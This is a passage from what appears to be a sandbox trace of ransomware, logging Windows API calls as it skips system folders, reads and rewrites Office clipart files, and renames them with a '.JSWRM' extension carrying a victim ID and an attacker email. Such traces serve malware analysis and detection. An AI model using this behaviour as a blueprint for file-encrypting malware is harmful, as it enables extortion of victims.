(lpString1="PSRETRO.WMF", lpString2="..") returned 1 [0095.275] lstrcmpiW (lpString1="PSRETRO.WMF", lpString2="...") returned 1 [0095.275] lstrcmpiW (lpString1="PSRETRO.WMF", lpString2="windows") returned -1 [0095.275] lstrcmpiW (lpString1="PSRETRO.WMF", lpString2="recovery") returned -1 [0095.275] lstrcmpiW (lpString1="PSRETRO.WMF", lpString2="perflogs") returned 1 [0095.275] lstrcmpiW (lpString1="PSRETRO.WMF", lpString2="documents and settings") returned 1 [0095.275] lstrcmpiW (lpString1="PSRETRO.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.275] lstrcmpiW (lpString1="PSRETRO.WMF", lpString2="system volume information") returned -1 [0095.275] lstrcmpiW (lpString1="PSRETRO.WMF", lpString2="msocache") returned 1 [0095.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0095.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRETRO.WMF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRETRO.WMF", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSRETRO.WMF", lpUsedDefaultChar=0x0) returned 11 [0095.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0095.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0095.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRETRO.WMF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRETRO.WMF", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSRETRO.WMF", lpUsedDefaultChar=0x0) returned 11 [0095.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0095.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0095.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0095.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSRETRO.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\psretro.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.276] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=982) returned 1 [0095.276] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3d0) returned 0x230a00 [0095.276] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x3d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x3d0, lpOverlapped=0x0) returned 1 [0095.279] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.279] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x3d0, lpOverlapped=0x0) returned 1 [0095.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0095.279] CloseHandle (hObject=0x314) returned 1 [0095.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0095.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0095.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0095.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0095.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0095.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0095.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0095.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0095.280] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSRETRO.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\psretro.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSRETRO.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\psretro.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0095.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0095.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.284] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe0a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PSSKETLG.WMF", cAlternateFileName="")) returned 1 [0095.284] lstrcmpiW (lpString1="PSSKETLG.WMF", lpString2=".") returned 1 [0095.284] lstrcmpiW (lpString1="PSSKETLG.WMF", lpString2="..") returned 1 [0095.284] lstrcmpiW (lpString1="PSSKETLG.WMF", lpString2="...") returned 1 [0095.284] lstrcmpiW (lpString1="PSSKETLG.WMF", lpString2="windows") returned -1 [0095.284] lstrcmpiW (lpString1="PSSKETLG.WMF", lpString2="recovery") returned -1 [0095.284] lstrcmpiW (lpString1="PSSKETLG.WMF", lpString2="perflogs") returned 1 [0095.284] lstrcmpiW (lpString1="PSSKETLG.WMF", lpString2="documents and settings") returned 1 [0095.284] lstrcmpiW (lpString1="PSSKETLG.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.284] lstrcmpiW (lpString1="PSSKETLG.WMF", lpString2="system volume information") returned -1 [0095.284] lstrcmpiW (lpString1="PSSKETLG.WMF", lpString2="msocache") returned 1 [0095.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0095.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSSKETLG.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSSKETLG.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSSKETLG.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0095.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSSKETLG.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSSKETLG.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSSKETLG.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0095.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0095.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0095.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETLG.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketlg.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.285] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3594) returned 1 [0095.285] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe00) returned 0x23fc98 [0095.285] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe00, lpOverlapped=0x0) returned 1 [0095.289] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.289] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe00, lpOverlapped=0x0) returned 1 [0095.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0095.289] CloseHandle (hObject=0x314) returned 1 [0095.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0095.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0095.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0095.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0095.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0095.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0095.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.289] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETLG.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketlg.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETLG.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketlg.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0095.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0095.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0095.290] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x776, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PSSKETSM.WMF", cAlternateFileName="")) returned 1 [0095.290] lstrcmpiW (lpString1="PSSKETSM.WMF", lpString2=".") returned 1 [0095.290] lstrcmpiW (lpString1="PSSKETSM.WMF", lpString2="..") returned 1 [0095.290] lstrcmpiW (lpString1="PSSKETSM.WMF", lpString2="...") returned 1 [0095.290] lstrcmpiW (lpString1="PSSKETSM.WMF", lpString2="windows") returned -1 [0095.290] lstrcmpiW (lpString1="PSSKETSM.WMF", lpString2="recovery") returned -1 [0095.290] lstrcmpiW (lpString1="PSSKETSM.WMF", lpString2="perflogs") returned 1 [0095.290] lstrcmpiW (lpString1="PSSKETSM.WMF", lpString2="documents and settings") returned 1 [0095.290] lstrcmpiW (lpString1="PSSKETSM.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.290] lstrcmpiW (lpString1="PSSKETSM.WMF", lpString2="system volume information") returned -1 [0095.290] lstrcmpiW (lpString1="PSSKETSM.WMF", lpString2="msocache") returned 1 [0095.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0095.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSSKETSM.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSSKETSM.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSSKETSM.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0095.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0095.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSSKETSM.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSSKETSM.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSSKETSM.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0095.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0095.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0095.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETSM.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketsm.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.291] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1910) returned 1 [0095.291] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x770) returned 0x20c6c0 [0095.291] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x770, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x770, lpOverlapped=0x0) returned 1 [0095.294] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.294] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x770, lpOverlapped=0x0) returned 1 [0095.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0095.294] CloseHandle (hObject=0x314) returned 1 [0095.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0095.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0095.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0095.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0095.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0095.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0095.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.295] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETSM.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketsm.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETSM.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketsm.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0095.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0095.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.296] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb12, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PSWAVY.WMF", cAlternateFileName="")) returned 1 [0095.296] lstrcmpiW (lpString1="PSWAVY.WMF", lpString2=".") returned 1 [0095.296] lstrcmpiW (lpString1="PSWAVY.WMF", lpString2="..") returned 1 [0095.296] lstrcmpiW (lpString1="PSWAVY.WMF", lpString2="...") returned 1 [0095.296] lstrcmpiW (lpString1="PSWAVY.WMF", lpString2="windows") returned -1 [0095.296] lstrcmpiW (lpString1="PSWAVY.WMF", lpString2="recovery") returned -1 [0095.296] lstrcmpiW (lpString1="PSWAVY.WMF", lpString2="perflogs") returned 1 [0095.296] lstrcmpiW (lpString1="PSWAVY.WMF", lpString2="documents and settings") returned 1 [0095.296] lstrcmpiW (lpString1="PSWAVY.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.296] lstrcmpiW (lpString1="PSWAVY.WMF", lpString2="system volume information") returned -1 [0095.296] lstrcmpiW (lpString1="PSWAVY.WMF", lpString2="msocache") returned 1 [0095.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSWAVY.WMF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSWAVY.WMF", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSWAVY.WMF", lpUsedDefaultChar=0x0) returned 10 [0095.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0095.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSWAVY.WMF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSWAVY.WMF", 